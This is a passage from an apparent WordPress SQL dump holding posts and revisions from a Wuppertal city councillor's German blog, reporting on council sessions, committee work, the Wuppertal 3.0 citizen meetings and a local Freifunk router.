Jahre.\r\n','Fraktionsmitglied','','publish','open','open','','fraktionsmitglied','','\nhttp://www.wuppertaler-rundschau.de/lokales/ein-pirat-bei-den-gruenen-aid-1.4848508','2015-02-12 08:07:13','2015-02-12 07:07:13','',0,'http://www.ollital.de/wordpress/?p=66',0,'post','',0),(67,2,'2015-02-05 07:57:52','2015-02-05 06:57:52','Da ich als Einzelkämpfer im Rat nicht viel reißen kann, habe ich direkt nach der Wahl Gespräche mit den meisten demokratischen Fraktionen geführt, um eine Zusammenarbeit einzufädeln. Da ich in den Wahlprogrammen von Piraten und Grünen die größte Schnittmenge fand, habe ich seit Juni 2014 dort hospitiert.\r\nMit einem einstimmigen Votum in der Fraktionssitzung vom 19.01.2015 wurde ich zum ordentlichen Mitglied der Fraktion von BÜNDNIS 90/ Die Grünen gewählt.\r\nAm 04.02.2015 hat auch Oberbürgermeister Peter Jung diesem zugestimmt.\r\nDamit hab ich es auch in die Presse geschafft.\r\nIch bin überwältigt und dankbar von diesem Ergebnis. Es ermöglicht mir eine sehr intensivere Zusammenarbeit und eröffnet mir bessere Möglichkeiten für die Ratsarbeit der kommenden Jahre.\r\n','Fraktionsmitglied','','inherit','open','open','','66-revision-v1','','','2015-02-05 07:57:52','2015-02-05 06:57:52','',66,'http://www.ollital.de/wordpress/?p=67',0,'revision','',0),(68,2,'2015-02-05 19:33:34','2015-02-05 18:33:34','Da ich als Einzelkämpfer im Rat nicht viel reißen kann, habe ich direkt nach der Wahl Gespräche mit den meisten demokratischen Fraktionen geführt, um eine Zusammenarbeit einzufädeln. Da ich in den Wahlprogrammen von Piraten und Grünen die größte Schnittmenge fand, habe ich seit Juni 2014 dort hospitiert.\r\nMit einem einstimmigen Votum in der Fraktionssitzung vom 19.01.2015 wurde ich zum ordentlichen Mitglied der Fraktion von BÜNDNIS 90/ Die Grünen gewählt.\r\nAm 04.02.2015 hat auch Oberbürgermeister Peter Jung diesem zugestimmt.\r\nDamit hab ich es auch in die Presse geschafft.\r\nIch bin überwältigt von diesemund dankbar für dieses Ergebnis. Es ermöglicht mir eine sehr intensivere Zusammenarbeit und eröffnet mir bessere Möglichkeiten für die Ratsarbeit der kommenden Jahre.\r\n','Fraktionsmitglied','','inherit','open','open','','66-revision-v1','','','2015-02-05 19:33:34','2015-02-05 18:33:34','',66,'http://www.ollital.de/wordpress/?p=68',0,'revision','',0),(69,2,'2015-02-10 21:34:37','2015-02-10 20:34:37','Die heutige Ratssitzung wurde vom Auftritt des Kinderprinzenpaars eingeleitet, für mich hat sowas immer was von erzwungener Fröhlichkeit, ich hatte aber das Gefühl, dass das etwas die erwartete Schärfe aus der Sitzung genommen hat.\r\nDas Hauptthema der heutigen Sondersitzung war die Vorlage zum Verkauf des Investorengrundstücks an Signature Capital. Nach der erwartet kontrovers geführten Debatte lautete dasAbstimmungsergebnis: 42 Ja, 13 Nein und 10 Enthaltungen. Damit kann Signature Capital sein Gebäude für Primark bauen. Ich habe Zweifel, dass der anvisierte Ankermieter wirklich das Optimale ist.\r\nDer zweite Tagesordnungspunkt war die Aufhebung des Verkaufbeschlusses des Carnaper Platzes vom 15.12.2014, der mit dem Rückzug der WSW unnötig wurde. Der Beschluss wurde einstimmig aufgehoben.\r\nEs bleibt jetzt abzuwarten, welcher Widerstand sich gegen Primark formieren wird. Die Prüfung eines Bürgerbegehrens wurde von Seite der Gegner schon angekündigt.\r\n\r\n','Ratssitzung vom 10.02.2015','','publish','open','open','','ratssitzung-vom-10-02-2015','','','2015-02-10 21:34:37','2015-02-10 20:34:37','',0,'http://www.ollital.de/wordpress/?p=69',0,'post','',0),(70,2,'2015-02-10 21:34:26','2015-02-10 20:34:26','Die heutige Ratssitzung wurde vom Auftritt des Kinderprinzenpaars eingeleitet, für mich hat sowas immer was von erzwungener Fröhlichkeit, ich hatte aber das Gefühl, dass das etwas die erwartete Schärfe aus der Sitzung genommen hat.\r\nDas Hauptthema der heutigen Sondersitzung war die Vorlage zum Verkauf des Investorengrundstücks an Signature Capital. Nach der erwartet kontrovers geführten Debatte lautete dasAbstimmungsergebnis: 42 Ja, 13 Nein und 10 Enthaltungen. Damit kann Signature Capital sein Gebäude für Primark bauen. Ich habe Zweifel, dass der anvisierte Ankermieter wirklich das Optimale ist.\r\nDer zweite Tagesordnungspunkt war die Aufhebung des Verkaufbeschlusses des Carnaper Platzes vom 15.12.2014, der mit dem Rückzug der WSW unnötig wurde. Der Beschluss wurde einstimmig aufgehoben.\r\nEs bleibt jetzt abzuwarten, welcher Widerstand sich gegen Primark formieren wird. Die Prüfung eines Bürgerbegehrens wurde von Seite der Gegner schon angekündigt.\r\n\r\n','Ratssitzung vom 10.02.2015','','inherit','open','open','','69-revision-v1','','','2015-02-10 21:34:26','2015-02-10 20:34:26','',69,'http://www.ollital.de/wordpress/?p=70',0,'revision','',0),(71,2,'2015-02-12 08:04:58','2015-02-12 07:04:58','Am 11.02.2015 startete die Veranstaltungsreihe Wuppertal 3.0 in der Villamedia. Unter Leitung von Jörg Heynkes und und Lothar Leuschen sammelten die etwa 150\r\nAnwesenden alles, was positiv an Wuppertal ist. Von den Bereichen Kultur, Mobilität bis zum Sport kam dort eine Menge zusammen. Vor allem das Engagement der Bürger in den vielen Vereinen und Bürgerbewegungen wurde mehrfach hervorgehoben.\r\nIn Folgeveranstaltungen sollen diese Themen dann weiter konkretisiert werden. Auch die Möglichkeit einenen unabhängigen Oberbürgermeisterkandidaten aufzustellen wurde kurz erwähnt.\r\n','Wuppertal 3.0','','publish','open','open','','wuppertal-3-0','','','2015-02-12 08:04:58','2015-02-12 07:04:58','',0,'http://www.ollital.de/wordpress/?p=71',0,'post','',0),(72,2,'2015-02-12 08:04:49','2015-02-12 07:04:49','Am 11.02.2015 startete die Veranstaltungsreihe Wuppertal 3.0 in der Villamedia. Unter Leitung von Jörg Heynkes und und Lothar Leuschen sammelten die etwa 150\r\nAnwesenden alles, was positiv an Wuppertal ist. Von den Bereichen Kultur, Mobilität bis zum Sport kam dort eine Menge zusammen. Vor allem das Engagement der Bürger in den vielen Vereinen und Bürgerbewegungen wurde mehrfach hervorgehoben.\r\nIn Folgeveranstaltungen sollen diese Themen dann weiter konkretisiert werden. Auch die Möglichkeit einenen unabhängigen Oberbürgermeisterkandidaten aufzustellen wurde kurz erwähnt.\r\n','Wuppertal 3.0','','inherit','open','open','','71-revision-v1','','','2015-02-12 08:04:49','2015-02-12 07:04:49','',71,'http://www.ollital.de/wordpress/?p=72',0,'revision','',0),(73,2,'2015-02-12 08:07:13','2015-02-12 07:07:13','Da ich als Einzelkämpfer im Rat nicht viel reißen kann, habe ich direkt nach der Wahl Gespräche mit den meisten demokratischen Fraktionen geführt, um eine Zusammenarbeit einzufädeln. Da ich in den Wahlprogrammen von Piraten und Grünen die größte Schnittmenge fand, habe ich seit Juni 2014 dort hospitiert.\r\nMit einem einstimmigen Votum in der Fraktionssitzung vom 19.01.2015 wurde ich zum ordentlichen Mitglied der Fraktion von BÜNDNIS 90/ Die Grünen gewählt.\r\nAm 04.02.2015 hat auch Oberbürgermeister Peter Jung diesem zugestimmt.\r\nDamit hab ich es auch in die Presse geschafft.\r\nIch bin überwältigt von diesem und dankbar für dieses Ergebnis. Es ermöglicht mir eine sehr intensivere Zusammenarbeit und eröffnet mir bessere Möglichkeiten für die Ratsarbeit der kommenden Jahre.\r\n','Fraktionsmitglied','','inherit','open','open','','66-revision-v1','','','2015-02-12 08:07:13','2015-02-12 07:07:13','',66,'http://www.ollital.de/wordpress/?p=73',0,'revision','',0),(74,2,'2015-02-12 10:18:03','2015-02-12 09:18:03','Olli Graf, Wuppertaler gebürtig und aus Überzeugung.\r\nJahrgang 1969\r\nDipl. Inform. (FH)\r\nPirat\r\nStadtverordneter im Rat der Stadt Wuppertal #talrat\r\nAuschuss für Stadtentwicklung, Wirtschaft und Bauen\r\nBetriebsauschuss Gebäudemanagement Wuppertal\r\nMitglied in der Fraktion BÜNDNIS 90 / Die Grünen im Stadtrat\r\n\r\nStadtverordneter Olli Graf\r\nJohannes-Rau-Platz 1\r\n42275 Wuppertal\r\n01523/4719093\r\nollirat@ollital.de\r\n','Über mich','','publish','open','open','','uber-mich','','','2015-11-18 15:43:14','2015-11-18 14:43:14','',0,'http://www.ollital.de/wordpress/?page_id=74',0,'page','',0),(75,2,'2015-02-12 10:17:22','2015-02-12 09:17:22','Olli Graf, Wuppertaler aus Überzeugung.\r\nJahrgang 1969\r\nPirat\r\nMitglied in der Fraktion BÜNDNIS 90 / Die Grünen im Stadtrat #talrat\r\n','Über mich','','inherit','open','open','','74-revision-v1','','','2015-02-12 10:17:22','2015-02-12 09:17:22','',74,'http://www.ollital.de/wordpress/?p=75',0,'revision','',0),(76,2,'2015-02-12 10:17:55','2015-02-12 09:17:55','Olli Graf, Wuppertaler aus Überzeugung.\r\nJahrgang 1969\r\nDipl. Inform. (FH)\r\nPirat\r\nMitglied in der Fraktion BÜNDNIS 90 / Die Grünen im Stadtrat #talrat\r\n','Über mich','','inherit','open','open','','74-revision-v1','','','2015-02-12 10:17:55','2015-02-12 09:17:55','',74,'http://www.ollital.de/wordpress/?p=76',0,'revision','',0),(85,2,'2015-02-26 07:17:41','2015-02-26 06:17:41','In Vertretung einer erkrankten Fraktionskollegin nahm ich am 25.02.2015 an der Sitzung des Ausschuss für Schule und Bildung teil.\r\nDas am ausführlichsten diskutierte Thema war der Zwischenbericht zum Handlungskonzept Inklusion - Ein Wuppertal für Alle\r\nDazu wurde die Sanierung des Gymnasiums am Kothen beschlossen, für die in 4 Bauabschnitten ca. 8,4 Mio Euro investiert werden.\r\n','Schulausschuss 25.02.2015','','publish','open','open','','schulausschuss-25-02-2015','','\nhttp://www.wz-newsline.de/lokales/wuppertal/stadtteile/barmen/gymnasium-am-kothen-wird-fuer-84-millionen-euro-saniert-1.1874641','2015-02-26 07:17:41','2015-02-26 06:17:41','',0,'http://www.ollital.de/wordpress/?p=85',0,'post','',0),(86,2,'2015-02-26 07:15:58','2015-02-26 06:15:58','In Vertretung einer erkrankten Fraktionskollegin nahm ich am 25.02.2015 an der Sitzung des Ausschuss für Schule und Bildung teil.\r\nDas am ausführlichsten diskutierte Thema war der Zwischenbericht zum Handlungskonzept Inklusion - Ein Wuppertal für Alle\r\nDazu wurde die Sanierung des Gymnasiums am Kothen beschlossen, für die in 4 Bauabschnitten ca. 8,4 Mio Euro investiert werden.\r\n','Schulausschuss 25.02.2015','','inherit','open','open','','85-revision-v1','','','2015-02-26 07:15:58','2015-02-26 06:15:58','',85,'http://www.ollital.de/wordpress/?p=86',0,'revision','',0),(87,2,'2015-02-26 07:17:28','2015-02-26 06:17:28','In Vertretung einer erkrankten Fraktionskollegin nahm ich am 25.02.2015 an der Sitzung des Ausschuss für Schule und Bildung teil.\r\nDas am ausführlichsten diskutierte Thema war der Zwischenbericht zum Handlungskonzept Inklusion - Ein Wuppertal für Alle\r\nDazu wurde die Sanierung des Gymnasiums am Kothen beschlossen, für die in 4 Bauabschnitten ca. 8,4 Mio Euro investiert werden.\r\n','Schulausschuss 25.02.2015','','inherit','open','open','','85-revision-v1','','','2015-02-26 07:17:28','2015-02-26 06:17:28','',85,'http://www.ollital.de/wordpress/?p=87',0,'revision','',0),(88,2,'2015-02-27 07:47:42','2015-02-27 06:47:42','Die Sitzung war etwas ungewöhnlich, da für die Trauerfeier für den ehemaligen OB Kremendahl am folgenden Tag die Pulte und Sessel aus dem Ratssaal rausgeräumt waren und nur eine Reihe Tische und mehrere Reihen Stühle für die beratenden Mitglieder aufgestellt waren. Da dadurch auch die Mikros fehlten, war die Akkustik nicht sehr gut. Ich musste die ganze Sitzung über mein iPad auf dem Oberschenkel balancieren.\r\nDa dies die erste reguläre Sitzung in diesem Jahr war, war die Tagesordnung mit 34 Punkten sehr viel umfangreicher als üblich.\r\nInhaltlich begann die Sitzung mit einem Bericht von Strassen NRW über den sechsstreifigen Ausbau der A46 zwischen Brücke Westring und Sonnborner Kreuz. Dies beinhaltet auch eine Erhöhung der Lärmschutzwände.\r\nUnbeantwortet blieb aber die Frage, welche Staugefahren am Ende des sechsstreifigen Ausbaus entstehen werden.\r\nDie Stellungnahme der Stadt wurde dann beschlossen, so dass das Planfeststellungsverfahren jetzt seinen weiteren Gang nehmen kann. Es wurde klar betont, dass der Ausbau nicht vor Abschluss der Arbeiten am Döppersberg beginnen sollen. (Das hab ich doch schonmal gehört)\r\n\r\nHerr Dr. Krause von der Bergischen Universität referierte zum Breitbandausbau in Wuppertal und betonte, dass ein breitbandiger Netzausbau ein klarer Standortvorteil ist, sowohl für Gewerbe als auch für privat.\r\n\r\nAuf mehr oder weniger Zustimmung traf das Vorhaben eines Investors zur Nachfolgenutzung des Gaskessels Heckinghausen\r\n\r\nDie Gesellschaft für Markt- und Absatzforschung mbH stellte das Einzelhandels- und Zentrenkonzept vor.\r\n\r\nDie üblichen Bebauungsplanänderungsanträge wurden glücklicherweise zügig bearbeitet.\r\nHerauszuheben ist noch die Anlage zur Vorlage Bebauungsplan 1175 - Gathe / Ludwigstraße / Markomannenstraße - 2. Verlängerung einer Veränderungssperre in der das AZ weiterhin ganz klar aus der beplanten Fläche ausgeklammert ist.','Ausschuss für Stadtentwicklung Wirtschaft und Bauen 26.02.2015','','publish','open','open','','ausschuss-fur-stadtentwicklung-wirtschaft-und-bauen-26-02-2015','','','2015-02-27 07:48:20','2015-02-27 06:48:20','',0,'http://www.ollital.de/wordpress/?p=88',0,'post','',0),(89,2,'2015-02-27 07:45:48','2015-02-27 06:45:48','Die Sitzung war etwas ungewöhnlich, da für die Trauerfeier für den ehemaligen OB Kremendahl am folgenden Tag die Pulte und Sessel aus dem Ratssaal rausgeräumt waren und nur eine Reihe Tische und mehrere Reihen Stühle für die beratenden Mitglieder aufgestellt waren. Da dadurch auch die Mikros fehlten, war die Akkustik nicht sehr gut.\r\nDa dies die erste reguläre Sitzung in diesem Jahr war, war die Tagesordnung mit 34 Punkten sehr viel umfangreicher als üblich.\r\nInhaltlich begann die Sitzung mit einem Bericht von Strassen NRW über den sechsstreifigen Ausbau der A46 zwischen Brücke Westring und Sonnborner Kreuz. Dies beinhaltet auch eine Erhöhung der Lärmschutzwände.\r\nUnbeantwortet blieb aber die Frage, welche Staugefahren am Ende des sechsstreifigen Ausbaus entstehen werden.\r\nDie Stellungnahme der Stadt wurde dann beschlossen, so dass das Planfeststellungsverfahren jetzt seinen weiteren Gang nehmen kann. Es wurde klar betont, dass der Ausbau nicht vor Abschluss der Arbeiten am Döppersberg beginnen sollen. (Das hab ich doch schonmal gehört)\r\n\r\nHerr Dr. Krause von der Bergischen Universität referierte zum Breitbandausbau in Wuppertal und stellte klar fest, dass ein breitbandiger Netzausbau ein klarer Standortvorteil ist, sowohl für Gewrbe als auch für privat.\r\n\r\nAuf mehr oder weniger Zustimmung traf das Vorhaben eines Investors zur Nachfolgenutzung des Gaskessels Heckinghausen\r\n\r\nDie Gesellschaft für Markt- und Absatzforschung mbH stellte das Einzelhandels- und Zentrenkonzept vor.\r\n\r\nDie üblichen Bebauungsplanänderungsanträge wurden glücklicherweise zügig bearbeitet.\r\nHerauszuheben ist noch die Anlage zur Vorlage Bebauungsplan 1175 - Gathe / Ludwigstraße / Markomannenstraße - 2. Verlängerung einer Veränderungssperre in der das AZ weiterhin ganz klar aus der beplanten Fläche ausgeklammert ist.','Ausschuss für Stadtentwicklung Wirtschaft und Bauen 26.02.2015','','inherit','open','open','','88-revision-v1','','','2015-02-27 07:45:48','2015-02-27 06:45:48','',88,'http://www.ollital.de/wordpress/?p=89',0,'revision','',0),(90,2,'2015-02-27 07:46:35','2015-02-27 06:46:35','Die Sitzung war etwas ungewöhnlich, da für die Trauerfeier für den ehemaligen OB Kremendahl am folgenden Tag die Pulte und Sessel aus dem Ratssaal rausgeräumt waren und nur eine Reihe Tische und mehrere Reihen Stühle für die beratenden Mitglieder aufgestellt waren. Da dadurch auch die Mikros fehlten, war die Akkustik nicht sehr gut.\r\nDa dies die erste reguläre Sitzung in diesem Jahr war, war die Tagesordnung mit 34 Punkten sehr viel umfangreicher als üblich.\r\nInhaltlich begann die Sitzung mit einem Bericht von Strassen NRW über den sechsstreifigen Ausbau der A46 zwischen Brücke Westring und Sonnborner Kreuz. Dies beinhaltet auch eine Erhöhung der Lärmschutzwände.\r\nUnbeantwortet blieb aber die Frage, welche Staugefahren am Ende des sechsstreifigen Ausbaus entstehen werden.\r\nDie Stellungnahme der Stadt wurde dann beschlossen, so dass das Planfeststellungsverfahren jetzt seinen weiteren Gang nehmen kann. Es wurde klar betont, dass der Ausbau nicht vor Abschluss der Arbeiten am Döppersberg beginnen sollen. (Das hab ich doch schonmal gehört)\r\n\r\nHerr Dr. Krause von der Bergischen Universität referierte zum Breitbandausbau in Wuppertal und betonte, dass ein breitbandiger Netzausbau ein klarer Standortvorteil ist, sowohl für Gewerbe als auch für privat.\r\n\r\nAuf mehr oder weniger Zustimmung traf das Vorhaben eines Investors zur Nachfolgenutzung des Gaskessels Heckinghausen\r\n\r\nDie Gesellschaft für Markt- und Absatzforschung mbH stellte das Einzelhandels- und Zentrenkonzept vor.\r\n\r\nDie üblichen Bebauungsplanänderungsanträge wurden glücklicherweise zügig bearbeitet.\r\nHerauszuheben ist noch die Anlage zur Vorlage Bebauungsplan 1175 - Gathe / Ludwigstraße / Markomannenstraße - 2. Verlängerung einer Veränderungssperre in der das AZ weiterhin ganz klar aus der beplanten Fläche ausgeklammert ist.','Ausschuss für Stadtentwicklung Wirtschaft und Bauen 26.02.2015','','inherit','open','open','','88-revision-v1','','','2015-02-27 07:46:35','2015-02-27 06:46:35','',88,'http://www.ollital.de/wordpress/?p=90',0,'revision','',0),(91,2,'2015-02-27 07:47:42','2015-02-27 06:47:42','Die Sitzung war etwas ungewöhnlich, da für die Trauerfeier für den ehemaligen OB Kremendahl am folgenden Tag die Pulte und Sessel aus dem Ratssaal rausgeräumt waren und nur eine Reihe Tische und mehrere Reihen Stühle für die beratenden Mitglieder aufgestellt waren. Da dadurch auch die Mikros fehlten, war die Akkustik nicht sehr gut. Ich musste die ganze Sitzung über mein iPad auf dem Oberschenkel balancieren.\r\nDa dies die erste reguläre Sitzung in diesem Jahr war, war die Tagesordnung mit 34 Punkten sehr viel umfangreicher als üblich.\r\nInhaltlich begann die Sitzung mit einem Bericht von Strassen NRW über den sechsstreifigen Ausbau der A46 zwischen Brücke Westring und Sonnborner Kreuz. Dies beinhaltet auch eine Erhöhung der Lärmschutzwände.\r\nUnbeantwortet blieb aber die Frage, welche Staugefahren am Ende des sechsstreifigen Ausbaus entstehen werden.\r\nDie Stellungnahme der Stadt wurde dann beschlossen, so dass das Planfeststellungsverfahren jetzt seinen weiteren Gang nehmen kann. Es wurde klar betont, dass der Ausbau nicht vor Abschluss der Arbeiten am Döppersberg beginnen sollen. (Das hab ich doch schonmal gehört)\r\n\r\nHerr Dr. Krause von der Bergischen Universität referierte zum Breitbandausbau in Wuppertal und betonte, dass ein breitbandiger Netzausbau ein klarer Standortvorteil ist, sowohl für Gewerbe als auch für privat.\r\n\r\nAuf mehr oder weniger Zustimmung traf das Vorhaben eines Investors zur Nachfolgenutzung des Gaskessels Heckinghausen\r\n\r\nDie Gesellschaft für Markt- und Absatzforschung mbH stellte das Einzelhandels- und Zentrenkonzept vor.\r\n\r\nDie üblichen Bebauungsplanänderungsanträge wurden glücklicherweise zügig bearbeitet.\r\nHerauszuheben ist noch die Anlage zur Vorlage Bebauungsplan 1175 - Gathe / Ludwigstraße / Markomannenstraße - 2. Verlängerung einer Veränderungssperre in der das AZ weiterhin ganz klar aus der beplanten Fläche ausgeklammert ist.','Ausschuss für Stadtentwicklung Wirtschaft und Bauen 26.02.2015','','inherit','open','open','','88-revision-v1','','','2015-02-27 07:47:42','2015-02-27 06:47:42','',88,'http://www.ollital.de/wordpress/?p=91',0,'revision','',0),(98,2,'2015-03-04 08:02:12','2015-03-04 07:02:12','In Utopiastadt fand gestern abend das zweite Treffen der Wuppertal 3.0 Bewegung statt.\r\nZur Vertiefung der beim ersten Treffen gesammelten Themkomplexe gab es Kurzvorträge zu den Themen\r\n\r\n
                                                                  \r\n
                                                                • Energie
                                                                • \r\n
                                                                • Mobilität
                                                                • \r\n
                                                                • Stadtentwicklung
                                                                • \r\n
                                                                \r\ndurch Fachreferenten.\r\nDanach konnte über die geäusserten Thesen separat mit den Referenten diskutiert werden.\r\nIm Gesamtplenum wurde zum Schluss über die Diskussionen reflektiert und weitere Ideen gesammelt.\r\n','2. Treffen Wuppertal 3.0','','publish','open','open','','2-treffen-wuppertal-3-0','','','2015-03-04 08:03:00','2015-03-04 07:03:00','',0,'http://www.ollital.de/wordpress/?p=98',0,'post','',0),(99,2,'2015-03-04 08:01:41','2015-03-04 07:01:41','In Utopiastadt fand gestern abend das zweite Treffen der Wuppertal 3.0 Bewegung statt.\r\nZur Vertiefung der beim ersten Treffen gesammelten Themkomplexe gab es Kurzvorträge zu den Themen\r\n\r\n
                                                                  \r\n
                                                                • Energie
                                                                • \r\n
                                                                • Mobilität
                                                                • \r\n
                                                                • Stadtentwicklung
                                                                • \r\n\r\ndurch Fachreferenten.\r\nDanach konnte über die geäusserten Thesen diskutiert werden.\r\nIm Gesamtplenum wurde zum Schluss über die Diskussionen reflektiert und weitere Ideen gesammelt.\r\n
                                                                ','2. Treffen Wuppertal 3.0','','inherit','open','open','','98-revision-v1','','','2015-03-04 08:01:41','2015-03-04 07:01:41','',98,'http://www.ollital.de/wordpress/?p=99',0,'revision','',0),(100,2,'2015-03-04 08:01:57','2015-03-04 07:01:57','In Utopiastadt fand gestern abend das zweite Treffen der Wuppertal 3.0 Bewegung statt.\r\nZur Vertiefung der beim ersten Treffen gesammelten Themkomplexe gab es Kurzvorträge zu den Themen\r\n\r\n
                                                                  \r\n
                                                                • Energie
                                                                • \r\n
                                                                • Mobilität
                                                                • \r\n
                                                                • Stadtentwicklung
                                                                • \r\n
                                                                \r\ndurch Fachreferenten.\r\nDanach konnte über die geäusserten Thesen diskutiert werden.\r\nIm Gesamtplenum wurde zum Schluss über die Diskussionen reflektiert und weitere Ideen gesammelt.\r\n','2. Treffen Wuppertal 3.0','','inherit','open','open','','98-revision-v1','','','2015-03-04 08:01:57','2015-03-04 07:01:57','',98,'http://www.ollital.de/wordpress/?p=100',0,'revision','',0),(101,2,'2015-03-04 08:03:00','2015-03-04 07:03:00','In Utopiastadt fand gestern abend das zweite Treffen der Wuppertal 3.0 Bewegung statt.\r\nZur Vertiefung der beim ersten Treffen gesammelten Themkomplexe gab es Kurzvorträge zu den Themen\r\n\r\n
                                                                  \r\n
                                                                • Energie
                                                                • \r\n
                                                                • Mobilität
                                                                • \r\n
                                                                • Stadtentwicklung
                                                                • \r\n
                                                                \r\ndurch Fachreferenten.\r\nDanach konnte über die geäusserten Thesen separat mit den Referenten diskutiert werden.\r\nIm Gesamtplenum wurde zum Schluss über die Diskussionen reflektiert und weitere Ideen gesammelt.\r\n','2. Treffen Wuppertal 3.0','','inherit','open','open','','98-revision-v1','','','2015-03-04 08:03:00','2015-03-04 07:03:00','',98,'http://www.ollital.de/wordpress/?p=101',0,'revision','',0),(103,2,'2015-03-08 15:54:05','2015-03-08 14:54:05','Nach langem Basteln hab ich\'s jetzt endich hinbekommen, dass der obere Teil des Fischertals von meinem Freifunkrouter versorgt wird (ff-ollital).','Freifunk im Fischertal','','publish','open','open','','freifunk-im-fischertal','','','2015-03-08 15:54:05','2015-03-08 14:54:05','',0,'http://www.ollital.de/wordpress/?p=103',0,'post','',0),(104,2,'2015-03-08 15:54:05','2015-03-08 14:54:05','Nach langem Basteln hab ich\'s jetzt endich hinbekommen, dass der obere Teil des Fischertals von meinem Freifunkrouter versorgt wird (ff-ollital).','Freifunk im Fischertal','','inherit','open','open','','103-revision-v1','','','2015-03-08 15:54:05','2015-03-08 14:54:05','',103,'http://www.ollital.de/wordpress/?p=104',0,'revision','',0),(105,2,'2015-03-10 07:16:42','2015-03-10 06:16:42','Panagiotis Paschalis (SPD) wurde ohne Gegenkandidat zum Beigeordneten für Bürgerbeteiligung, Recht, Beteiligungsmanagement und E-Government (37 von 64 möglichen Stimmen). Es bleibt jetzt abzuwarten, ob er es schafft, die Verwaltung dazu zu bringen, Bürgerbeteiligung zu leben. In seiner Vorstellung in der Fraktionssitzung schien er nicht viel von Bürgerbeteiligung zu verstehen. Konkrete Pläne konnte er nicht nennen.\r\nDer Offenlegungsbeschluss für IKEA wurde einstimmig beschlossen, ebenso die Stellungnahme der Stadt zum Planverfahren für den sechsstreifigen Ausbau der A 46 (zwischen Brücke Westring und Sonnborner Kreuz).\r\nDurch den gestrigen Beschluss ist eine Nachfolgenutzung des Gaskessels in Heckinghausen auf den Weg gebracht. Die Stadt fördert den Bau von Büros, Fitness-Studio und Gastronomie mit bis zu 500.000,- EUR. Ich halte das Projekt für eine gute Aufwertung des Stadtteils.\r\nDesweiteren wurde der Bau von 6 neuen Kita mit insgesamt 500 Plätzen beschlossen.\r\n','Ratssitzung vom 09.03.2014','','publish','open','open','','ratssitzung-vom-09-03-2014','','','2015-03-10 09:38:54','2015-03-10 08:38:54','',0,'http://www.ollital.de/wordpress/?p=105',0,'post','',0),(106,2,'2015-03-10 07:16:27','2015-03-10 06:16:27','Panagiotis Paschalis (SPD) wurde ohne Gegenkandidat zum Beigeordneten für Bürgerbeteiligung, Recht, Beteiligungsmanagement und E-Government (37 von 64 möglichen Stimmen). Es bleibt jetzt abzuwarten, ob er es schafft, die Verwaltung dazu zu bringen, Bürgerbeteiligung zu leben. In seiner Vorstellung in der Fraktionssitzung schien er nicht viel von Bürgerbeteiligung zu verstehen. Konkrete Pläne konnte er nicht nennen.\r\nDer Offenlegungsbeschluss für IKEA wurde einstimmig beschlossen, ebenso die Stellungnahme der Stadt zum Planverfahren für den sechsstreifigen Ausbau der A 46 (zwischen Brücke Westring und Sonnborner Kreuz).\r\nDurch den gestrigen Beschluss ist eine Nachfolgenutzung des Gaskessels in Heckinghausen auf den Weg gebracht.\r\n','Ratssitzung vom 09.03.2014','','inherit','open','open','','105-revision-v1','','','2015-03-10 07:16:27','2015-03-10 06:16:27','',105,'http://www.ollital.de/wordpress/?p=106',0,'revision','',0),(107,2,'2015-03-10 09:38:05','2015-03-10 08:38:05','Panagiotis Paschalis (SPD) wurde ohne Gegenkandidat zum Beigeordneten für Bürgerbeteiligung, Recht, Beteiligungsmanagement und E-Government (37 von 64 möglichen Stimmen). Es bleibt jetzt abzuwarten, ob er es schafft, die Verwaltung dazu zu bringen, Bürgerbeteiligung zu leben. In seiner Vorstellung in der Fraktionssitzung schien er nicht viel von Bürgerbeteiligung zu verstehen. Konkrete Pläne konnte er nicht nennen.\nDer Offenlegungsbeschluss für IKEA wurde einstimmig beschlossen, ebenso die Stellungnahme der Stadt zum Planverfahren für den sechsstreifigen Ausbau der A 46 (zwischen Brücke Westring und Sonnborner Kreuz).\nDurch den gestrigen Beschluss ist eine Nachfolgenutzung des Gaskessels in Heckinghausen auf den Weg gebracht. Die Stadt fördert den Bau von Büros, Fitness-Studio und Gastronomie mit bis zu 500.000,- EUR. Ich halte das fürProjekt für eine gute Aufwertung des Stadtteils.\nDesweiteren wurde der Bau von 6 neuen Kita mit insgesamt 500 Plätzen beschlossen\n','Ratssitzung vom 09.03.2014','','inherit','open','open','','105-autosave-v1','','','2015-03-10 09:38:05','2015-03-10 08:38:05','',105,'http://www.ollital.de/wordpress/?p=107',0,'revision','',0),(108,2,'2015-03-10 09:38:09','2015-03-10 08:38:09','Panagiotis Paschalis (SPD) wurde ohne Gegenkandidat zum Beigeordneten für Bürgerbeteiligung, Recht, Beteiligungsmanagement und E-Government (37 von 64 möglichen Stimmen). Es bleibt jetzt abzuwarten, ob er es schafft, die Verwaltung dazu zu bringen, Bürgerbeteiligung zu leben. In seiner Vorstellung in der Fraktionssitzung schien er nicht viel von Bürgerbeteiligung zu verstehen. Konkrete Pläne konnte er nicht nennen.\r\nDer Offenlegungsbeschluss für IKEA wurde einstimmig beschlossen, ebenso die Stellungnahme der Stadt zum Planverfahren für den sechsstreifigen Ausbau der A 46 (zwischen Brücke Westring und Sonnborner Kreuz).\r\nDurch den gestrigen Beschluss ist eine Nachfolgenutzung des Gaskessels in Heckinghausen auf den Weg gebracht. Die Stadt fördert den Bau von Büros, Fitness-Studio und Gastronomie mit bis zu 500.000,- EUR. Ich halte das fürProjekt für eine gute Aufwertung des Stadtteils.\r\nDesweiteren wurde der Bau von 6 neuen Kita mit insgesamt 500 Plätzen beschlossen.\r\n','Ratssitzung vom 09.03.2014','','inherit','open','open','','105-revision-v1','','','2015-03-10 09:38:09','2015-03-10 08:38:09','',105,'http://www.ollital.de/wordpress/?p=108',0,'revision','',0),(109,2,'2015-03-10 09:38:54','2015-03-10 08:38:54','Panagiotis Paschalis (SPD) wurde ohne Gegenkandidat zum Beigeordneten für Bürgerbeteiligung, Recht, Beteiligungsmanagement und E-Government (37 von 64 möglichen Stimmen). Es bleibt jetzt abzuwarten, ob er es schafft, die Verwaltung dazu zu bringen, Bürgerbeteiligung zu leben. In seiner Vorstellung in der Fraktionssitzung schien er nicht viel von Bürgerbeteiligung zu verstehen. Konkrete Pläne konnte er nicht nennen.\r\nDer Offenlegungsbeschluss für IKEA wurde einstimmig beschlossen, ebenso die Stellungnahme der Stadt zum Planverfahren für den sechsstreifigen Ausbau der A 46 (zwischen Brücke Westring und Sonnborner Kreuz).\r\nDurch den gestrigen Beschluss ist eine Nachfolgenutzung des Gaskessels in Heckinghausen auf den Weg gebracht. Die Stadt fördert den Bau von Büros, Fitness-Studio und Gastronomie mit bis zu 500.000,- EUR. Ich halte das Projekt für eine gute Aufwertung des 